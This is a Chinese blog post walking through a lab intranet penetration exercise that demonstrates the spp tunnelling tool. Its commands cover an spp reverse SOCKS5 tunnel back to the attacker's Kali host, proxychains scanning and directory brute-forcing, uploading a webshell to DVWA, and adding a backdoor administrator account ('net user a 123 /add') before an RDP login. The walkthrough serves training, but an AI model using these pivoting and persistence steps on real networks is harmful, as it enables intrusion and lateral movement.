spp内网渗透试验

试验拓扑:(说明:这个环境只是博主能够想到的一个比较简单的内网的环境,各位师傅们也可以使用别的内网环境,这个试验的目的是学会spp如何做内网穿透,环境不重要的!!!!)
在这里插入图片描述

这里补充一点,内网的机器使用机主机模式,但是这里不去勾选,这样的话内网的主机就完全与宿主机隔离在这里插入图片描述

一台kali 一台centos 一台win7

ip配置:
kali:192.168.12.20
centos:192.168.12.30    10.10.20.13    
win7:10.10.20.12  10.10.30.1

条件是:

kali能与centos的12.30这个网卡互通
centos的20.13网卡与win7的20.12网卡通
kali作为外网,centos作为内外网隔离的机器,win7完全是隔离外网,作为内网
这里我们直接使用centos作为跳板机,得到win7的服务,然后得到3389远程桌面,之后登陆,拿下内网的win7机器!

使用kali进行主机发现
在这里插入图片描述

这里发现有个30,使用nmap进行扫描
在这里插入图片描述

这里只有22端口,利用22端口进行漏洞利用,我们可以使用hydra或者msf
在这里插入图片描述

这里我们得到了账号密码,我们登陆(密码是空格,所以这里没有显示,正常情况下有密码,用字典是可以爆破出来的)
在这里插入图片描述

这里我们发现有个10.10.20.13的网络,我们可以进行内网的探测
但是这里我们需要去加入一个socks通道,所以我们使用spp这个工具或者使用frp,这里还可以使用msf。
在这里插入图片描述

通过scp命令讲这个工具传入到目标主机中

./spp -type server -proto tcp -listen :8888 --nolog 1 -noprint 1 &  在服务器端建立连接

./spp.exe -name "fxdlsocks" -type reverse_socks5_client -server 192.168.12.20:8888 -fromaddr  192.168.12.20:1080 -proxyproto tcp -proto tcp -noprint 1 -nolog 1 &  在目标主机这边使用这个,将其连接到服务器,并且在服务器的1080端口开放socks代理  --nolog是 1 是不打印日志 --noprint 1 不在终端中输出任何内容(这里可以在客户端使用,服务器端建议不要使用,可以观看流量用)

在这里插入图片描述

服务器端这里就开放了1080端口,我们这个时候就可以使用socks代理了
在这里插入图片描述

vim /etc/proxychains4.conf  在这个配置文件的末尾写入socks代理的ip地址以及端口(这里建立了socks代理以后,使用proxycvhains来进行配置,这个是kali自带的工具,windows中可以使用proxifier和sockscap64这些代理工具)

在这里插入图片描述

git clone https://github.com/zer0h/httpscan#httpscan s使用这个工具对c段就行扫描(一个c段扫描的工具,还有很多,各位大哥,可以自己去找找看)
proxychains python cscan1.py -i 10.10.20.0/24  对c段进行扫描(使用代理扫描,否则扫描不到)

经过我们进行信息收集发现,这里有一个10.10.20.11的地址
在这里插入图片描述

并且是有一个80端口的站点
那我们就使用代理去探测这个站点有什么目录

proxychains dirb http://10.10.20.11 /root/mulu.txt  使用这个文件去探测

在这里插入图片描述

有dvwa目录,我们可以去查看dvwa(这里只是展示spp工具的使用,所以这里直接使用了dvwa靶场,各位可以尝试使用其他的cms或者靶场)
在这里插入图片描述

这里使用代理打开浏览器
在这里插入图片描述

(这里爆破用户名密码,就不做展示了,跟web渗透一样,bp就可以直接拿下!)

我们传入一个一句话
在这里插入图片描述

这里我们找到路径了,我们直接使用websehll工具连接,这里我使用哥斯拉(这里同理直接使用代理打开,也可以打开以后配置代理,这里还可以使用Antsword)
在这里插入图片描述

这里成功getshell在这里插入图片描述

这里成功的拿下,发现是20.11他还有一个30网段的ip
在这里插入图片描述

这里我们使用端口扫描发现他开放有3389(各位这里也可以使用代理然后利用端口扫描的工具进行扫描也可以)
在这里插入图片描述

这里我们就可以创建一个用户,然后3389远程登陆(也可以使用ew或者lcx做一个内网端口转发)

使用net  user a 123 /add 创建一个a用户密码是123
使用net  localgroup administrators a /add 将a用户添加到管理员组中

在这里插入图片描述

使用

net user 查看到a用户

在这里插入图片描述

net  localgroup administrators   可以看到管理员组中的用户有什么,这里我们看到有a

在这里插入图片描述

使用a进行3389远程登陆拿下服务器

proxychains rdesktop 10.10.20.11 -u a -p 123 

在这里插入图片描述

成功拿下我们可以去看用户权限
在这里插入图片描述

使用a用户登陆成功(这个只是博主可以想到的一种方式,各位大哥有好的思路的话可以试试)

希望对各位有所帮助!内网的一些相关的在持续更新中!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JM丫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值